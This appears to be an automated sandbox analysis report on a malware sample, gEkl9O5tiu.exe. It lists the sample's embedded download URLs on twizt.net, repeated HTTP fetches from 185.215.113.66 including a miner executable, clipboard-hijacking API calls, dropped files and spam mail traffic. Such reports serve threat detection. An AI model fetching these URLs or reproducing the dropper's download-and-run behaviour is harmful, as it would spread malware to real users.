                            Source: gEkl9O5tiu.exe, gEkl9O5tiu.exe, 00000001.00000002.379592341.0000000000714000.00000004.00000020.00020000.00000000.sdmp, gEkl9O5tiu.exe, 00000001.00000002.379592341.000000000073C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe
                            Source: gEkl9O5tiu.exeString found in binary or memory: http://twizt.net/newtpp.exeP0
                            Source: gEkl9O5tiu.exe, 00000001.00000002.379592341.000000000073C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exeV
                            Source: gEkl9O5tiu.exeString found in binary or memory: http://twizt.net/peinstall.php
                            Source: gEkl9O5tiu.exeString found in binary or memory: http://twizt.net/peinstall.php%temp%%s
                            Source: gEkl9O5tiu.exe, 00000001.00000002.379592341.0000000000714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.php;O
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exeJump to behavior
                            Source: unknownDNS traffic detected: queries for: twizt.net
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeCode function: 1_2_01091080 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,wsprintfW,InternetOpenW,Sleep,InternetOpenUrlW,CreateFileW,InternetReadFile,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,Sleep,wsprintfW,DeleteFileW,Sleep,CloseHandle,wsprintfW,InternetCloseHandle,InternetCloseHandle,Sleep,rand,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,Sleep,1_2_01091080
                            Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                            Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: icanhazip.com
                            Source: global trafficHTTP traffic detected: GET /from/n.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /from/706.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66If-Modified-Since: Thu, 17 Aug 2023 12:32:50 GMTIf-None-Match: "64de1372-4700"
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66If-Modified-Since: Thu, 17 Aug 2023 12:32:50 GMTIf-None-Match: "64de1372-4700"
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66If-Modified-Since: Thu, 17 Aug 2023 12:32:50 GMTIf-None-Match: "64de1372-4700"
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /getxmr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00403480 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00403480
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_00403480 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00403480
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_00403480 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00403480
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_004041A0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,4_2_004041A0
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_004041A0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,4_2_004041A0
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00403480 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00403480

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Source: Yara matchFile source: 4.0.2550821914.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.2550821914.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.399820477.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.379469431.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.370252775.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.381787142.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 2550821914.exe PID: 680, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysesvcmw.exe PID: 1384, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysesvcmw.exe PID: 1840, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2550821914.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\ sysesvcmw.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exe, type: DROPPED
                            Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 192
